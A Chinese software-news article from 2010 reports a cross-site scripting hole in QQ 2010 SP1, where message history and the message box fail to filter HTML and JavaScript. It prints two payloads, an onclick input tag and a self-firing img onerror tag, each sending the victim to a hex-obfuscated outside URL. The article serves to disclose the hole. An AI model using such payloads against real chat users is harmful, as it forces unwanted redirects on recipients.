QQ腾讯2010SP1发布查看记录即现严重漏洞pc软件 文章资讯 手机软件

您当前的位置→图文中心新闻资讯业界快讯QQ腾讯2010SP1发布查看记录即现严重漏洞

QQ腾讯2010SP1发布查看记录即现严重漏洞


2010/7/29  编辑:admin 来源:本站整理   

腾讯QQ一向是腾讯主打的产品, 意想不到前天发布出来的QQ2010SP1竟然有如此大漏洞。

最先是囧一下:脚本出错还会提示错误

image

1、消息记录的Javascript、Html标签没有屏蔽

image

2、消息盒子Javascript、Html标签没有屏蔽

image

3、www.arpun.com 小实验

1、发送send代码:

以下为引用的内容:
<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />

因为腾讯会全自动将url转换, 我们我自己就一定要混淆url才能发送send

image

image

image

4、超牛代码

以下为引用的内容:
<img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>

因为要用鼠标点击才能触发, 想到一个不用用鼠标点击就能触发的代码。

5、真的希望腾讯快点修复, 这个漏洞非同小可

6、本漏洞由TGL发现。

 
 

提醒一定要注意, 本代码只供研究之用, 请勿用于不当用途。

如打算规避漏洞带来的风险, 请下载SP0版本, 看来SP1版本的changelog得修改为“更新了一些漏洞”。

相关文章
  • 生活中的QQ农场
  • QQ比心活动是什么?QQ比心接力活动介绍
  • QQ音乐怎么能够更换皮肤?QQ音乐更换皮肤的方法
  • 如何屏蔽QQ空间的游戏邀请?QQ空间屏蔽游戏邀请的方法
  • QQ音乐如何关注好友?
  • 官方微信推送的一个福利活动绑定公众号免费抽QQ豪华绿钻奖励
  • QQ钱包用户领取2元充值10元可抵扣
  • 至9月6日QQ旋风宣布即将停止使用
  • QQ输入法怎么截图?QQ输入法截图功能怎么用?
  • QQ应用管理器找不到?QQ应用管理器用来干什么?
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图